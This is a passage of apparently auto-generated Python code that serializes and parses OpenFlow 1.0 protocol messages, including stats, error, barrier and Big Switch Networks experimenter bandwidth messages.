                q.text("xid = ");
                if self.xid != None:
                    q.text("%#x" % self.xid)
                else:
                    q.text('None')
                q.text(","); q.breakable()
                q.text("flags = ");
                q.text("%#x" % self.flags)
            q.breakable()
        q.text('}')

message.subtypes[17] = stats_reply
class aggregate_stats_reply(stats_reply):
    """OpenFlow 1.0 aggregate stats reply (type 17, stats_type 2):
    packet_count(8B) byte_count(8B) flow_count(4B) + 4B pad.
    Generated by LOXI -- do not edit."""
    version = 1
    type = 17
    stats_type = 2
    def __init__(self, xid=None, flags=None, packet_count=None, byte_count=None, flow_count=None):
        if xid != None:
            self.xid = xid
        else:
            self.xid = None
        if flags != None:
            self.flags = flags
        else:
            self.flags = 0
        if packet_count != None:
            self.packet_count = packet_count
        else:
            self.packet_count = 0
        if byte_count != None:
            self.byte_count = byte_count
        else:
            self.byte_count = 0
        if flow_count != None:
            self.flow_count = flow_count
        else:
            self.flow_count = 0
        return
    def pack(self):
        """Serialize to wire format; length is patched in afterwards."""
        packed = []
        packed.append(struct.pack("!B", self.version))
        packed.append(struct.pack("!B", self.type))
        packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
        packed.append(struct.pack("!L", self.xid))
        packed.append(struct.pack("!H", self.stats_type))
        packed.append(struct.pack("!H", self.flags))
        packed.append(struct.pack("!Q", self.packet_count))
        packed.append(struct.pack("!Q", self.byte_count))
        packed.append(struct.pack("!L", self.flow_count))
        packed.append('\x00' * 4) # trailing pad bytes
        length = sum([len(x) for x in packed])
        packed[2] = struct.pack("!H", length)
        return ''.join(packed)
    @staticmethod
    def unpack(reader):
        """Deserialize an aggregate stats reply body."""
        obj = aggregate_stats_reply()
        _version = reader.read("!B")[0]
        assert(_version == 1)
        _type = reader.read("!B")[0]
        assert(_type == 17)
        _length = reader.read("!H")[0]
        orig_reader = reader
        reader = orig_reader.slice(_length, 4)
        obj.xid = reader.read("!L")[0]
        _stats_type = reader.read("!H")[0]
        assert(_stats_type == 2)
        obj.flags = reader.read("!H")[0]
        obj.packet_count = reader.read("!Q")[0]
        obj.byte_count = reader.read("!Q")[0]
        obj.flow_count = reader.read("!L")[0]
        reader.skip(4) # trailing pad
        return obj
    def __eq__(self, other):
        if type(self) != type(other): return False
        if self.xid != other.xid: return False
        if self.flags != other.flags: return False
        if self.packet_count != other.packet_count: return False
        if self.byte_count != other.byte_count: return False
        if self.flow_count != other.flow_count: return False
        return True
    def pretty_print(self, q):
        """Render a human-readable form through pretty-printer q."""
        q.text("aggregate_stats_reply {")
        with q.group():
            with q.indent(2):
                q.breakable()
                q.text("xid = ");
                if self.xid != None:
                    q.text("%#x" % self.xid)
                else:
                    q.text('None')
                q.text(","); q.breakable()
                q.text("flags = ");
                q.text("%#x" % self.flags)
                q.text(","); q.breakable()
                q.text("packet_count = ");
                q.text("%#x" % self.packet_count)
                q.text(","); q.breakable()
                q.text("byte_count = ");
                q.text("%#x" % self.byte_count)
                q.text(","); q.breakable()
                q.text("flow_count = ");
                q.text("%#x" % self.flow_count)
            q.breakable()
        q.text('}')

stats_reply.subtypes[2] = aggregate_stats_reply
class stats_request(message):
    """OpenFlow 1.0 stats request (header type 16).  Carries a stats_type
    selector and flags; concrete requests register in 'subtypes' keyed on
    stats_type.  Generated by LOXI -- do not edit."""
    subtypes = {}
    version = 1
    type = 16
    def __init__(self, xid=None, stats_type=None, flags=None):
        if xid != None:
            self.xid = xid
        else:
            self.xid = None
        if stats_type != None:
            self.stats_type = stats_type
        else:
            self.stats_type = 0
        if flags != None:
            self.flags = flags
        else:
            self.flags = 0
        return
    def pack(self):
        """Serialize to wire format; length is patched in afterwards."""
        packed = []
        packed.append(struct.pack("!B", self.version))
        packed.append(struct.pack("!B", self.type))
        packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
        packed.append(struct.pack("!L", self.xid))
        packed.append(struct.pack("!H", self.stats_type))
        packed.append(struct.pack("!H", self.flags))
        length = sum([len(x) for x in packed])
        packed[2] = struct.pack("!H", length)
        return ''.join(packed)
    @staticmethod
    def unpack(reader):
        """Deserialize, dispatching on the stats_type field at offset 8."""
        subtype, = reader.peek('!H', 8)
        subclass = stats_request.subtypes.get(subtype)
        if subclass:
            return subclass.unpack(reader)
        obj = stats_request()
        _version = reader.read("!B")[0]
        assert(_version == 1)
        _type = reader.read("!B")[0]
        assert(_type == 16)
        _length = reader.read("!H")[0]
        orig_reader = reader
        reader = orig_reader.slice(_length, 4)
        obj.xid = reader.read("!L")[0]
        obj.stats_type = reader.read("!H")[0]
        obj.flags = reader.read("!H")[0]
        return obj
    def __eq__(self, other):
        if type(self) != type(other): return False
        if self.xid != other.xid: return False
        if self.stats_type != other.stats_type: return False
        if self.flags != other.flags: return False
        return True
    def pretty_print(self, q):
        """Render a human-readable form through pretty-printer q."""
        q.text("stats_request {")
        with q.group():
            with q.indent(2):
                q.breakable()
                q.text("xid = ");
                if self.xid != None:
                    q.text("%#x" % self.xid)
                else:
                    q.text('None')
                q.text(","); q.breakable()
                q.text("flags = ");
                q.text("%#x" % self.flags)
            q.breakable()
        q.text('}')

message.subtypes[16] = stats_request
class aggregate_stats_request(stats_request):
    """OpenFlow 1.0 aggregate stats request (type 16, stats_type 2):
    a match structure, table_id(1B) + 1B pad, and an out_port filter.
    Generated by LOXI -- do not edit."""
    version = 1
    type = 16
    stats_type = 2
    def __init__(self, xid=None, flags=None, match=None, table_id=None, out_port=None):
        if xid != None:
            self.xid = xid
        else:
            self.xid = None
        if flags != None:
            self.flags = flags
        else:
            self.flags = 0
        if match != None:
            self.match = match
        else:
            self.match = ofp.match()
        if table_id != None:
            self.table_id = table_id
        else:
            self.table_id = 0
        if out_port != None:
            self.out_port = out_port
        else:
            self.out_port = 0
        return
    def pack(self):
        """Serialize to wire format; length is patched in afterwards."""
        packed = []
        packed.append(struct.pack("!B", self.version))
        packed.append(struct.pack("!B", self.type))
        packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
        packed.append(struct.pack("!L", self.xid))
        packed.append(struct.pack("!H", self.stats_type))
        packed.append(struct.pack("!H", self.flags))
        packed.append(self.match.pack())
        packed.append(struct.pack("!B", self.table_id))
        packed.append('\x00' * 1) # pad byte after table_id
        packed.append(util.pack_port_no(self.out_port))
        length = sum([len(x) for x in packed])
        packed[2] = struct.pack("!H", length)
        return ''.join(packed)
    @staticmethod
    def unpack(reader):
        """Deserialize an aggregate stats request body."""
        obj = aggregate_stats_request()
        _version = reader.read("!B")[0]
        assert(_version == 1)
        _type = reader.read("!B")[0]
        assert(_type == 16)
        _length = reader.read("!H")[0]
        orig_reader = reader
        reader = orig_reader.slice(_length, 4)
        obj.xid = reader.read("!L")[0]
        _stats_type = reader.read("!H")[0]
        assert(_stats_type == 2)
        obj.flags = reader.read("!H")[0]
        obj.match = ofp.match.unpack(reader)
        obj.table_id = reader.read("!B")[0]
        reader.skip(1) # pad byte after table_id
        obj.out_port = util.unpack_port_no(reader)
        return obj
    def __eq__(self, other):
        if type(self) != type(other): return False
        if self.xid != other.xid: return False
        if self.flags != other.flags: return False
        if self.match != other.match: return False
        if self.table_id != other.table_id: return False
        if self.out_port != other.out_port: return False
        return True
    def pretty_print(self, q):
        """Render a human-readable form through pretty-printer q."""
        q.text("aggregate_stats_request {")
        with q.group():
            with q.indent(2):
                q.breakable()
                q.text("xid = ");
                if self.xid != None:
                    q.text("%#x" % self.xid)
                else:
                    q.text('None')
                q.text(","); q.breakable()
                q.text("flags = ");
                q.text("%#x" % self.flags)
                q.text(","); q.breakable()
                q.text("match = ");
                q.pp(self.match)
                q.text(","); q.breakable()
                q.text("table_id = ");
                q.text("%#x" % self.table_id)
                q.text(","); q.breakable()
                q.text("out_port = ");
                q.text(util.pretty_port(self.out_port))
            q.breakable()
        q.text('}')

stats_request.subtypes[2] = aggregate_stats_request
class error_msg(message):
    """OpenFlow 1.0 error message (header type 1).  Carries an err_type
    selector; concrete errors register in 'subtypes' keyed on err_type.
    Generated by LOXI -- do not edit."""
    subtypes = {}
    version = 1
    type = 1
    def __init__(self, xid=None, err_type=None):
        if xid != None:
            self.xid = xid
        else:
            self.xid = None
        if err_type != None:
            self.err_type = err_type
        else:
            self.err_type = 0
        return
    def pack(self):
        """Serialize to wire format; length is patched in afterwards."""
        packed = []
        packed.append(struct.pack("!B", self.version))
        packed.append(struct.pack("!B", self.type))
        packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
        packed.append(struct.pack("!L", self.xid))
        packed.append(struct.pack("!H", self.err_type))
        length = sum([len(x) for x in packed])
        packed[2] = struct.pack("!H", length)
        return ''.join(packed)
    @staticmethod
    def unpack(reader):
        """Deserialize, dispatching on the err_type field at offset 8."""
        subtype, = reader.peek('!H', 8)
        subclass = error_msg.subtypes.get(subtype)
        if subclass:
            return subclass.unpack(reader)
        obj = error_msg()
        _version = reader.read("!B")[0]
        assert(_version == 1)
        _type = reader.read("!B")[0]
        assert(_type == 1)
        _length = reader.read("!H")[0]
        orig_reader = reader
        reader = orig_reader.slice(_length, 4)
        obj.xid = reader.read("!L")[0]
        obj.err_type = reader.read("!H")[0]
        return obj
    def __eq__(self, other):
        if type(self) != type(other): return False
        if self.xid != other.xid: return False
        if self.err_type != other.err_type: return False
        return True
    def pretty_print(self, q):
        """Render a human-readable form through pretty-printer q."""
        q.text("error_msg {")
        with q.group():
            with q.indent(2):
                q.breakable()
                q.text("xid = ");
                if self.xid != None:
                    q.text("%#x" % self.xid)
                else:
                    q.text('None')
            q.breakable()
        q.text('}')

message.subtypes[1] = error_msg
class bad_action_error_msg(error_msg):
    """OpenFlow 1.0 bad-action error (type 1, err_type 2): a 2-byte code
    followed by the raw offending data.  Generated by LOXI -- do not edit."""
    version = 1
    type = 1
    err_type = 2
    def __init__(self, xid=None, code=None, data=None):
        if xid != None:
            self.xid = xid
        else:
            self.xid = None
        if code != None:
            self.code = code
        else:
            self.code = 0
        if data != None:
            self.data = data
        else:
            self.data = ''
        return
    def pack(self):
        """Serialize to wire format; length is patched in afterwards."""
        packed = []
        packed.append(struct.pack("!B", self.version))
        packed.append(struct.pack("!B", self.type))
        packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
        packed.append(struct.pack("!L", self.xid))
        packed.append(struct.pack("!H", self.err_type))
        packed.append(struct.pack("!H", self.code))
        packed.append(self.data) # raw payload, appended verbatim
        length = sum([len(x) for x in packed])
        packed[2] = struct.pack("!H", length)
        return ''.join(packed)
    @staticmethod
    def unpack(reader):
        """Deserialize a bad-action error; remaining bytes become data."""
        obj = bad_action_error_msg()
        _version = reader.read("!B")[0]
        assert(_version == 1)
        _type = reader.read("!B")[0]
        assert(_type == 1)
        _length = reader.read("!H")[0]
        orig_reader = reader
        reader = orig_reader.slice(_length, 4)
        obj.xid = reader.read("!L")[0]
        _err_type = reader.read("!H")[0]
        assert(_err_type == 2)
        obj.code = reader.read("!H")[0]
        obj.data = str(reader.read_all())
        return obj
    def __eq__(self, other):
        if type(self) != type(other): return False
        if self.xid != other.xid: return False
        if self.code != other.code: return False
        if self.data != other.data: return False
        return True
    def pretty_print(self, q):
        """Render a human-readable form through pretty-printer q."""
        q.text("bad_action_error_msg {")
        with q.group():
            with q.indent(2):
                q.breakable()
                q.text("xid = ");
                if self.xid != None:
                    q.text("%#x" % self.xid)
                else:
                    q.text('None')
                q.text(","); q.breakable()
                q.text("code = ");
                q.text("%#x" % self.code)
                q.text(","); q.breakable()
                q.text("data = ");
                q.pp(self.data)
            q.breakable()
        q.text('}')

error_msg.subtypes[2] = bad_action_error_msg
class bad_request_error_msg(error_msg):
    """OpenFlow 1.0 bad-request error (type 1, err_type 1): a 2-byte code
    followed by the raw offending data.  Generated by LOXI -- do not edit."""
    version = 1
    type = 1
    err_type = 1
    def __init__(self, xid=None, code=None, data=None):
        if xid != None:
            self.xid = xid
        else:
            self.xid = None
        if code != None:
            self.code = code
        else:
            self.code = 0
        if data != None:
            self.data = data
        else:
            self.data = ''
        return
    def pack(self):
        """Serialize to wire format; length is patched in afterwards."""
        packed = []
        packed.append(struct.pack("!B", self.version))
        packed.append(struct.pack("!B", self.type))
        packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
        packed.append(struct.pack("!L", self.xid))
        packed.append(struct.pack("!H", self.err_type))
        packed.append(struct.pack("!H", self.code))
        packed.append(self.data) # raw payload, appended verbatim
        length = sum([len(x) for x in packed])
        packed[2] = struct.pack("!H", length)
        return ''.join(packed)
    @staticmethod
    def unpack(reader):
        """Deserialize a bad-request error; remaining bytes become data."""
        obj = bad_request_error_msg()
        _version = reader.read("!B")[0]
        assert(_version == 1)
        _type = reader.read("!B")[0]
        assert(_type == 1)
        _length = reader.read("!H")[0]
        orig_reader = reader
        reader = orig_reader.slice(_length, 4)
        obj.xid = reader.read("!L")[0]
        _err_type = reader.read("!H")[0]
        assert(_err_type == 1)
        obj.code = reader.read("!H")[0]
        obj.data = str(reader.read_all())
        return obj
    def __eq__(self, other):
        if type(self) != type(other): return False
        if self.xid != other.xid: return False
        if self.code != other.code: return False
        if self.data != other.data: return False
        return True
    def pretty_print(self, q):
        """Render a human-readable form through pretty-printer q."""
        q.text("bad_request_error_msg {")
        with q.group():
            with q.indent(2):
                q.breakable()
                q.text("xid = ");
                if self.xid != None:
                    q.text("%#x" % self.xid)
                else:
                    q.text('None')
                q.text(","); q.breakable()
                q.text("code = ");
                q.text("%#x" % self.code)
                q.text(","); q.breakable()
                q.text("data = ");
                q.pp(self.data)
            q.breakable()
        q.text('}')

error_msg.subtypes[1] = bad_request_error_msg
class barrier_reply(message):
    """OpenFlow 1.0 barrier reply (header type 19); header fields only.
    Generated by LOXI -- do not edit."""
    version = 1
    type = 19
    def __init__(self, xid=None):
        if xid != None:
            self.xid = xid
        else:
            self.xid = None
        return
    def pack(self):
        """Serialize to wire format; length is patched in afterwards."""
        packed = []
        packed.append(struct.pack("!B", self.version))
        packed.append(struct.pack("!B", self.type))
        packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
        packed.append(struct.pack("!L", self.xid))
        length = sum([len(x) for x in packed])
        packed[2] = struct.pack("!H", length)
        return ''.join(packed)
    @staticmethod
    def unpack(reader):
        """Deserialize a barrier reply (header only)."""
        obj = barrier_reply()
        _version = reader.read("!B")[0]
        assert(_version == 1)
        _type = reader.read("!B")[0]
        assert(_type == 19)
        _length = reader.read("!H")[0]
        orig_reader = reader
        reader = orig_reader.slice(_length, 4)
        obj.xid = reader.read("!L")[0]
        return obj
    def __eq__(self, other):
        if type(self) != type(other): return False
        if self.xid != other.xid: return False
        return True
    def pretty_print(self, q):
        """Render a human-readable form through pretty-printer q."""
        q.text("barrier_reply {")
        with q.group():
            with q.indent(2):
                q.breakable()
                q.text("xid = ");
                if self.xid != None:
                    q.text("%#x" % self.xid)
                else:
                    q.text('None')
            q.breakable()
        q.text('}')

message.subtypes[19] = barrier_reply
class barrier_request(message):
    """OpenFlow 1.0 barrier request (header type 18); header fields only.
    Generated by LOXI -- do not edit."""
    version = 1
    type = 18
    def __init__(self, xid=None):
        if xid != None:
            self.xid = xid
        else:
            self.xid = None
        return
    def pack(self):
        """Serialize to wire format; length is patched in afterwards."""
        packed = []
        packed.append(struct.pack("!B", self.version))
        packed.append(struct.pack("!B", self.type))
        packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
        packed.append(struct.pack("!L", self.xid))
        length = sum([len(x) for x in packed])
        packed[2] = struct.pack("!H", length)
        return ''.join(packed)
    @staticmethod
    def unpack(reader):
        """Deserialize a barrier request (header only)."""
        obj = barrier_request()
        _version = reader.read("!B")[0]
        assert(_version == 1)
        _type = reader.read("!B")[0]
        assert(_type == 18)
        _length = reader.read("!H")[0]
        orig_reader = reader
        reader = orig_reader.slice(_length, 4)
        obj.xid = reader.read("!L")[0]
        return obj
    def __eq__(self, other):
        if type(self) != type(other): return False
        if self.xid != other.xid: return False
        return True
    def pretty_print(self, q):
        """Render a human-readable form through pretty-printer q."""
        q.text("barrier_request {")
        with q.group():
            with q.indent(2):
                q.breakable()
                q.text("xid = ");
                if self.xid != None:
                    q.text("%#x" % self.xid)
                else:
                    q.text('None')
            q.breakable()
        q.text('}')

message.subtypes[18] = barrier_request
class experimenter(message):
    """OpenFlow 1.0 experimenter/vendor message (header type 4): a 4-byte
    experimenter id plus raw payload.  Subclasses register in 'subtypes'
    keyed on the experimenter id.  Generated by LOXI -- do not edit."""
    subtypes = {}
    version = 1
    type = 4
    def __init__(self, xid=None, experimenter=None, data=None):
        if xid != None:
            self.xid = xid
        else:
            self.xid = None
        if experimenter != None:
            self.experimenter = experimenter
        else:
            self.experimenter = 0
        if data != None:
            self.data = data
        else:
            self.data = ''
        return
    def pack(self):
        """Serialize to wire format; length is patched in afterwards."""
        packed = []
        packed.append(struct.pack("!B", self.version))
        packed.append(struct.pack("!B", self.type))
        packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
        packed.append(struct.pack("!L", self.xid))
        packed.append(struct.pack("!L", self.experimenter))
        packed.append(self.data) # raw payload, appended verbatim
        length = sum([len(x) for x in packed])
        packed[2] = struct.pack("!H", length)
        return ''.join(packed)
    @staticmethod
    def unpack(reader):
        """Deserialize, dispatching on the experimenter id at offset 8."""
        subtype, = reader.peek('!L', 8)
        subclass = experimenter.subtypes.get(subtype)
        if subclass:
            return subclass.unpack(reader)
        obj = experimenter()
        _version = reader.read("!B")[0]
        assert(_version == 1)
        _type = reader.read("!B")[0]
        assert(_type == 4)
        _length = reader.read("!H")[0]
        orig_reader = reader
        reader = orig_reader.slice(_length, 4)
        obj.xid = reader.read("!L")[0]
        obj.experimenter = reader.read("!L")[0]
        obj.data = str(reader.read_all())
        return obj
    def __eq__(self, other):
        if type(self) != type(other): return False
        if self.xid != other.xid: return False
        if self.experimenter != other.experimenter: return False
        if self.data != other.data: return False
        return True
    def pretty_print(self, q):
        """Render a human-readable form through pretty-printer q."""
        q.text("experimenter {")
        with q.group():
            with q.indent(2):
                q.breakable()
                q.text("xid = ");
                if self.xid != None:
                    q.text("%#x" % self.xid)
                else:
                    q.text('None')
                q.text(","); q.breakable()
                q.text("data = ");
                q.pp(self.data)
            q.breakable()
        q.text('}')

message.subtypes[4] = experimenter
class bsn_header(experimenter):
    """Big Switch Networks experimenter message base (experimenter id
    6035143): adds a 4-byte subtype selector; concrete BSN messages
    register in 'subtypes' keyed on it.  Generated by LOXI -- do not edit."""
    subtypes = {}
    version = 1
    type = 4
    experimenter = 6035143
    def __init__(self, xid=None, subtype=None):
        if xid != None:
            self.xid = xid
        else:
            self.xid = None
        if subtype != None:
            self.subtype = subtype
        else:
            self.subtype = 0
        return
    def pack(self):
        """Serialize to wire format; length is patched in afterwards."""
        packed = []
        packed.append(struct.pack("!B", self.version))
        packed.append(struct.pack("!B", self.type))
        packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
        packed.append(struct.pack("!L", self.xid))
        packed.append(struct.pack("!L", self.experimenter))
        packed.append(struct.pack("!L", self.subtype))
        length = sum([len(x) for x in packed])
        packed[2] = struct.pack("!H", length)
        return ''.join(packed)
    @staticmethod
    def unpack(reader):
        """Deserialize, dispatching on the BSN subtype field at offset 12."""
        subtype, = reader.peek('!L', 12)
        subclass = bsn_header.subtypes.get(subtype)
        if subclass:
            return subclass.unpack(reader)
        obj = bsn_header()
        _version = reader.read("!B")[0]
        assert(_version == 1)
        _type = reader.read("!B")[0]
        assert(_type == 4)
        _length = reader.read("!H")[0]
        orig_reader = reader
        reader = orig_reader.slice(_length, 4)
        obj.xid = reader.read("!L")[0]
        _experimenter = reader.read("!L")[0]
        assert(_experimenter == 6035143)
        obj.subtype = reader.read("!L")[0]
        return obj
    def __eq__(self, other):
        if type(self) != type(other): return False
        if self.xid != other.xid: return False
        if self.subtype != other.subtype: return False
        return True
    def pretty_print(self, q):
        """Render a human-readable form through pretty-printer q."""
        q.text("bsn_header {")
        with q.group():
            with q.indent(2):
                q.breakable()
                q.text("xid = ");
                if self.xid != None:
                    q.text("%#x" % self.xid)
                else:
                    q.text('None')
            q.breakable()
        q.text('}')

experimenter.subtypes[6035143] = bsn_header
class bsn_bw_clear_data_reply(bsn_header):
    """BSN bandwidth clear-data reply (subtype 22): 4-byte status.
    Generated by LOXI -- do not edit."""
    version = 1
    type = 4
    experimenter = 6035143
    subtype = 22
    def __init__(self, xid=None, status=None):
        if xid != None:
            self.xid = xid
        else:
            self.xid = None
        if status != None:
            self.status = status
        else:
            self.status = 0
        return
    def pack(self):
        """Serialize to wire format; length is patched in afterwards."""
        packed = []
        packed.append(struct.pack("!B", self.version))
        packed.append(struct.pack("!B", self.type))
        packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
        packed.append(struct.pack("!L", self.xid))
        packed.append(struct.pack("!L", self.experimenter))
        packed.append(struct.pack("!L", self.subtype))
        packed.append(struct.pack("!L", self.status))
        length = sum([len(x) for x in packed])
        packed[2] = struct.pack("!H", length)
        return ''.join(packed)
    @staticmethod
    def unpack(reader):
        """Deserialize a BSN bw clear-data reply."""
        obj = bsn_bw_clear_data_reply()
        _version = reader.read("!B")[0]
        assert(_version == 1)
        _type = reader.read("!B")[0]
        assert(_type == 4)
        _length = reader.read("!H")[0]
        orig_reader = reader
        reader = orig_reader.slice(_length, 4)
        obj.xid = reader.read("!L")[0]
        _experimenter = reader.read("!L")[0]
        assert(_experimenter == 6035143)
        _subtype = reader.read("!L")[0]
        assert(_subtype == 22)
        obj.status = reader.read("!L")[0]
        return obj
    def __eq__(self, other):
        if type(self) != type(other): return False
        if self.xid != other.xid: return False
        if self.status != other.status: return False
        return True
    def pretty_print(self, q):
        """Render a human-readable form through pretty-printer q."""
        q.text("bsn_bw_clear_data_reply {")
        with q.group():
            with q.indent(2):
                q.breakable()
                q.text("xid = ");
                if self.xid != None:
                    q.text("%#x" % self.xid)
                else:
                    q.text('None')
                q.text(","); q.breakable()
                q.text("status = ");
                q.text("%#x" % self.status)
            q.breakable()
        q.text('}')

bsn_header.subtypes[22] = bsn_bw_clear_data_reply
class bsn_bw_clear_data_request(bsn_header):
    """BSN bandwidth clear-data request (subtype 21); no body fields.
    Generated by LOXI -- do not edit."""
    version = 1
    type = 4
    experimenter = 6035143
    subtype = 21
    def __init__(self, xid=None):
        if xid != None:
            self.xid = xid
        else:
            self.xid = None
        return
    def pack(self):
        """Serialize to wire format; length is patched in afterwards."""
        packed = []
        packed.append(struct.pack("!B", self.version))
        packed.append(struct.pack("!B", self.type))
        packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
        packed.append(struct.pack("!L", self.xid))
        packed.append(struct.pack("!L", self.experimenter))
        packed.append(struct.pack("!L", self.subtype))
        length = sum([len(x) for x in packed])
        packed[2] = struct.pack("!H", length)
        return ''.join(packed)
    @staticmethod
    def unpack(reader):
        """Deserialize a BSN bw clear-data request."""
        obj = bsn_bw_clear_data_request()
        _version = reader.read("!B")[0]
        assert(_version == 1)
        _type = reader.read("!B")[0]
        assert(_type == 4)
        _length = reader.read("!H")[0]
        orig_reader = reader
        reader = orig_reader.slice(_length, 4)
        obj.xid = reader.read("!L")[0]
        _experimenter = reader.read("!L")[0]
        assert(_experimenter == 6035143)
        _subtype = reader.read("!L")[0]
        assert(_subtype == 21)
        return obj
    def __eq__(self, other):
        if type(self) != type(other): return False
        if self.xid != other.xid: return False
        return True
    def pretty_print(self, q):
        """Render a human-readable form through pretty-printer q."""
        q.text("bsn_bw_clear_data_request {")
        with q.group():
            with q.indent(2):
                q.breakable()
                q.text("xid = ");
                if self.xid != None:
                    q.text("%#x" % self.xid)
                else:
                    q.text('None')
            q.breakable()
        q.text('}')

bsn_header.subtypes[21] = bsn_bw_clear_data_request
class bsn_bw_enable_get_reply(bsn_header):
    """BSN bandwidth enable-get reply (subtype 20): 4-byte enabled flag.
    Generated by LOXI -- do not edit."""
    version = 1
    type = 4
    experimenter = 6035143
    subtype = 20
    def __init__(self, xid=None, enabled=None):
        if xid != None:
            self.xid = xid
        else:
            self.xid = None
        if enabled != None:
            self.enabled = enabled
        else:
            self.enabled = 0
        return
    def pack(self):
        """Serialize to wire format; length is patched in afterwards."""
        packed = []
        packed.append(struct.pack("!B", self.version))
        packed.append(struct.pack("!B", self.type))
        packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
        packed.append(struct.pack("!L", self.xid))
        packed.append(struct.pack("!L", self.experimenter))
        packed.append(struct.pack("!L", self.subtype))
        packed.append(struct.pack("!L", self.enabled))
        length = sum([len(x) for x in packed])
        packed[2] = struct.pack("!H", length)
        return ''.join(packed)
    @staticmethod
    def unpack(reader):
        """Deserialize a BSN bw enable-get reply."""
        obj = bsn_bw_enable_get_reply()
        _version = reader.read("!B")[0]
        assert(_version == 1)
        _type = reader.read("!B")[0]
        assert(_type == 4)
        _length = reader.read("!H")[0]
        orig_reader = reader
        reader = orig_reader.slice(_length, 4)
        obj.xid = reader.read("!L")[0]
        _experimenter = reader.read("!L")[0]
        assert(_experimenter == 6035143)
        _subtype = reader.read("!L")[0]
        assert(_subtype == 20)
        obj.enabled = reader.read("!L")[0]
        return obj
    def __eq__(self, other):
        if type(self) != type(other): return False
        if self.xid != other.xid: return False
        if self.enabled != other.enabled: return False
        return True
    def pretty_print(self, q):
        """Render a human-readable form through pretty-printer q."""
        q.text("bsn_bw_enable_get_reply {")
        with q.group():
            with q.indent(2):
                q.breakable()
                q.text("xid = ");
                if self.xid != None:
                    q.text("%#x" % self.xid)
                else:
                    q.text('None')
                q.text(","); q.breakable()
                q.text("enabled = ");
                q.text("%#x" % self.enabled)
            q.breakable()
        q.text('}')

bsn_header.subtypes[20] = bsn_bw_enable_get_reply
class bsn_bw_enable_get_request(bsn_header):
    """BSN bandwidth enable-get request (subtype 19); no body fields.
    Generated by LOXI -- do not edit."""
    version = 1
    type = 4
    experimenter = 6035143
    subtype = 19
    def __init__(self, xid=None):
        if xid != None:
            self.xid = xid
        else:
            self.xid = None
        return
    def pack(self):
        """Serialize to wire format; length is patched in afterwards."""
        packed = []
        packed.append(struct.pack("!B", self.version))
        packed.append(struct.pack("!B", self.type))
        packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
        packed.append(struct.pack("!L", self.xid))
        packed.append(struct.pack("!L", self.experimenter))
        packed.append(struct.pack("!L", self.subtype))
        length = sum([len(x) for x in packed])
        packed[2] = struct.pack("!H", length)
        return ''.join(packed)
    @staticmethod
    def unpack(reader):
        """Deserialize a BSN bw enable-get request."""
        obj = bsn_bw_enable_get_request()
        _version = reader.read("!B")[0]
        assert(_version == 1)
        _type = reader.read("!B")[0]
        assert(_type == 4)
        _length = reader.read("!H")[0]
        orig_reader = reader
        reader = orig_reader.slice(_length, 4)
        obj.xid = reader.read("!L")[0]
        _experimenter = reader.read("!L")[0]
        assert(_experimenter == 6035143)
        _subtype = reader.read("!L")[0]
        assert(_subtype == 19)
        return obj
    def __eq__(self, other):
        if type(self) != type(other): return False
        if self.xid != other.xid: return False
        return True
    def pretty_print(self, q):
        """Render a human-readable form through pretty-printer q."""
        q.text("bsn_bw_enable_get_request {")
        with q.group():
            with q.indent(2):
                q.breakable()
                q.text("xid = ");
                if self.xid != None:
                    q.text("%#x" % self.xid)
                else:
                    q.text('None')
            q.breakable()
        q.text('}')

bsn_header.subtypes[19] = bsn_bw_enable_get_request
class bsn_bw_enable_set_reply(bsn_header):
    """BSN bandwidth enable-set reply (subtype 23): 4-byte enable flag
    followed by 4-byte status.  Generated by LOXI -- do not edit."""
    version = 1
    type = 4
    experimenter = 6035143
    subtype = 23
    def __init__(self, xid=None, enable=None, status=None):
        if xid != None:
            self.xid = xid
        else:
            self.xid = None
        if enable != None:
            self.enable = enable
        else:
            self.enable = 0
        if status != None:
            self.status = status
        else:
            self.status = 0
        return
    def pack(self):
        """Serialize to wire format; length is patched in afterwards."""
        packed = []
        packed.append(struct.pack("!B", self.version))
        packed.append(struct.pack("!B", self.type))
        packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
        packed.append(struct.pack("!L", self.xid))
        packed.append(struct.pack("!L", self.experimenter))
        packed.append(struct.pack("!L", self.subtype))
        packed.append(struct.pack("!L", self.enable))
        packed.append(struct.pack("!L", self.status))
        length = sum([len(x) for x in packed])
        packed[2] = struct.pack("!H", length)
        return ''.join(packed)
    @staticmethod
    def unpack(reader):
        """Deserialize a BSN bw enable-set reply."""
        obj = bsn_bw_enable_set_reply()
        _version = reader.read("!B")[0]
        assert(_version == 1)
        _type = reader.read("!B")[0]
        assert(_type == 4)
        _length = reader.read("!H")[0]
        orig_reader = reader
        reader = orig_reader.slice(_length, 4)
        obj.xid = reader.read("!L")[0]
        _experimenter = reader.read("!L")[0]
        assert(_experimenter == 6035143)
        _subtype = reader.read("!L")[0]
        assert(_subtype == 23)
        obj.enable = reader.read("!L")[0]
        obj.status = reader.read("!L")[0]
        return obj
    def __eq__(self, other):
        if type(self) != type(other): return False
        if self.xid != other.xid: return False
        if self.enable != other.enable: return False
        if self.status != other.status: return False
        return True
    def pretty_print(self, q):
        """Render a human-readable form through pretty-printer q."""
        q.text("bsn_bw_enable_set_reply {")
        with q.group():
            with q.indent(2):
                q.breakable()
                q.text("xid = ");
                if self.xid != None:
                    q.text("%#x" % self.xid)
                else:
                    q.text('None')
                q.text(","); q.breakable()
                q.text("enable = ");
                q.text("%#x" % self.enable)
                q.text(","); q.breakable()
                q.text("status = ");
                q.text("%#x" % self.status)
            q.breakable()
        q.text('}')

bsn_header.subtypes[23] = bsn_bw_enable_set_reply
class bsn_bw_enable_set_request(bsn_header):
    """BSN experimenter message, subtype 18: enable/disable bandwidth feature.

    Payload after the experimenter header: enable (u32).
    """
    version = 1
    type = 4
    experimenter = 6035143
    subtype = 18
    def __init__(self, xid=None, enable=None):
        if xid != None:
            self.xid = xid
        else:
            self.xid = None
        if enable != None:
